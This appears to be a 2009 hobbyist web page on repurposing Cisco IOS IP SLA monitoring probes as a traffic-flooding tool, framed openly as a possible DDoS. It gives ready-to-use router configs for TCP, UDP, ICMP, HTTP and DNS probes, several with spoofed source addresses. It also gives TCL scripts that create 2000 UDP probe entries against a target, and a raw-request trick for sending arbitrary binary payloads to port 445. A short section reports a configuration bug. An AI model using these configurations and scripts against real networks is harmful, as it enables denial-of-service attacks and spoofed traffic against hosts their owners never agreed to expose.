cisco ip sla attack
IP SLA
with the IP SLA function in the IOS, there is a other way to create packets to a specific port and target. Normaly used for testing the availability of services and/or devices, but i think, there is a chance for abuse.
See some of my ideas.
- what, if we create 1000 SLA's on the same router
- create a TCL script for creating the 1000 SLA's
- create scheduled SLA's for a DDoS on a defined time
- create random DNS or HTTP Querys

Cisco SLA Packet Samples
SLA Sample TCP Port
tcp connections to 192.168.1.1 port 99 every 1 second
	ip sla 1
	 tcp-connect 192.168.1.1 99 control disable
	 threshold 1 
	 timeout 1
	 frequency 1
	ip sla schedule 1 life 300 start-time now
SLA Sample UDP Port
udp connections to 192.168.1.1 port 100 from sourceip 1.2.3.4 and sourceport 12345 every 1 second
	ip sla 2
	 udp-echo 192.168.1.1 100 source-ip 1.2.3.4 source-port 12345 control disable
	 threshold 1	
	 timeout 1
	 frequency 1
	ip sla schedule 2 life 300 start-time now
SLA Sample ICMP
tcp connections to 192.168.1.1 port 100 every 1 second
	ip sla 3
	 icmp-echo 192.168.1.1
	 threshold 1
	 timeout 1
	 frequency 1
	ip sla schedule 3 life 300 start-time now
SLA Sample FTP
FTP to check, if a file is on a FTP server
	ip sla 11
	 ftp get ftp://user:password@host/file_name
	!
	ip sla schedule 11 start-time now

SLA Sample HTTP
HTTP connections to 192.168.1.1 port 100 every 1 second with file index.html
(Limit: Minimum frequency for HTTP should be 60sec )
	ip sla 4
	 http get http://192.168.2.100/index.html
	 threshold 1
	 timeout 1
	 frequency 60
	ip sla schedule 4 life 300 start-time now
SLA Sample HTTP (RAW)
HTTP connections to 192.168.1.1 every 1 second with RAW Code
(Limit: Minimum frequency for HTTP should be 60sec )
	ip sla 5
	 http raw http://192.168.1.1
	 http-raw-request
	  GET /ch/index.html HTTP/1.0\r\n\r\n
	  exit
	 threshold 1
	 timeout 1
	 frequency 60
	ip sla schedule 5 life 300 start-time now
SLA Sample DNS
DNS request www.laber.com every 9 second to dns server 192.168.1.1
Minimum frequency for DNS operation should be 9
	ip sla 6
	 dns www.laber.com name-server 192.168.1.1
 	 timeout 1
 	 threshold 1
  	 frequency 9
	ip sla schedule 10 life 300 start-time now
Schedule the SLA
	
	ip sla schedule 1 start-time 10:00:00 life 300 recurring           <- every day at 10:00 for 300 seconds
	ip sla schedule 2 start-time now life forever                      <- start now and run forever
	ip sla schedule 3 start-time 10:00:00 1 Jan life 1000              <- start on 1.Jan for 1000 seconds
play around with the options, Source-ip and source-port Lifetime, thershold etc..
and for testing with source-ip and source-port, the source-ip must NOT exist on a Loopback Interface. For flooding it's requierd, that you have to enter "control disable". For HTTP or DNS Request, you can not enable or diesale "control", beacause, there is no "CISCO" Responder.

TCL script with SLA packet packets
Script Sample UDP
This TCL Script creats 2000 "ip sla" etntires in the config file, each on creat every secoand a udp packet to the targen host 192.168.1.1 and destination port 100 for 5 Minutes. (300 Seconds)
Warning: Use a lot of CPU Power, and depending on your hardware, 2000 is to mutch.
 
	puts "Creating UDP"
	set count 2000
	for {set X 1} {$X<$count} {incr X} {
	puts $X
	ios_config "ip sla $X" "udp-echo 192.168.1.1 100 control disable" "threshold 1" "timeout 1" "frequency 1"
	ios_config "ip sla schedule $X life 300 start-time now"
	}
and for removing all entries
	puts "Deleting"
	set count 2000
	for {set X 1} {$X<$count} {incr X} {
	puts $X
	ios_config "no ip sla $X "
    	}
New Sample with Sourceport and Source-IP
 
	puts "Creating UDP"
	set count 2000
	for {set X 1} {$X<$count} {incr X} {
	puts $X
	ios_config "ip sla $X" "udp-echo 192.168.1.1 100 source-ip 1.2.3.4 source-port 12345 control disable" "threshold 1" "timeout 1" "frequency 1"
	ios_config "ip sla schedule $X life 300 start-time now"
	}

send binary data
with the http raw options it's possible, to send TEXT and Binary Code. to a selectable port (Source IPD and Port is changable to)
You can send 0x01 with the string \x01 in the http-raw-request.
 
Sample :
 ip sla 1
  http raw http://laber.peanuts.ch:445
  http-raw-request
  \x01\x02\x03\x48\x41\x4C\x4C\x4F\xff    
  exit
 !
 ip sla schedule 1 start-time now
 
Known Problem Currently, i found NO way, to send a "NULL" (0x00), arghh...
 
Known Limits - max 1280 chars in the config file.
- max 252 chars per line
- \x23 for sendening #
- \x?? reduce tha max packet length.
 

strange things...
Some stranges things, maybe feautures or bugs?
1. it's possible to set the TOS to 255, but in the DCSP Fields in the packets, i see only that the 6 DSCP bits ar set.
	evil-router(config-ip-sla-tcp)#tos ?
	  <0-255>  Type of Service Value
2. Some problem with the order in the configfile and the dependency of timeout and threshold
If you configure timeout 1 and threshold 1, you must configure threshold before timeout, but, after you see in the configuratin file following: timeout is before treshold.
	ip sla 4
	 tcp-connect 192.168.2.100 98 control disable
	 tos 1
	 timeout 1
	 threshold 1
	 frequency 1
	ip sla schedule 4 life 60 start-time now
and after a restart you see following boot message:
	
	1 DSL controller
	9 FastEthernet interfaces
	1 ISDN Basic Rate interface
	62720K bytes of ATA CompactFlash (Read/Write)
	Installed image archive
	%Error: timeout value is less than threshold 5000
	%Illegal Value: Cannot set Frequency to be less than Timeout
	%Error: timeout value is less than threshold 5000
	%Illegal Value: Cannot set Frequency to be less than Timeout
	
	
		
	Press RETURN to get started!
	
I see this on my cisco 1800 router
	evil-router#sh version
	Cisco IOS Software, C180X Software (C180X-ADVIPSERVICESK9-M), Version 12.4(22)T, RELEASE SOFTWARE (fc1)
	Technical Support: http://www.cisco.com/techsupport
Update:(05.01.2009)
Tests with other routers and diffenet IOS versions shows me, that that must be a BUG on this version on my Cisco 1800 Router.
 
Cisco Dokumentation
 
threshold milliseconds
(Optional) Sets the upper threshold value for calculating network monitoring statistics created by an IP SLAs operation.
Example:
Router(config-sla-monitor-echo)# threshold 10000
 
timeout milliseconds (Optional) Sets the amount of time an IP SLAs operation waits for a response from its request packet.
Example:
Router(config-sla-monitor-echo)# timeout 10000
 

cisco sla links
Cisco IP SLA Infos

(c) 2009 by packetlevel.ch / last update: 26.4.2009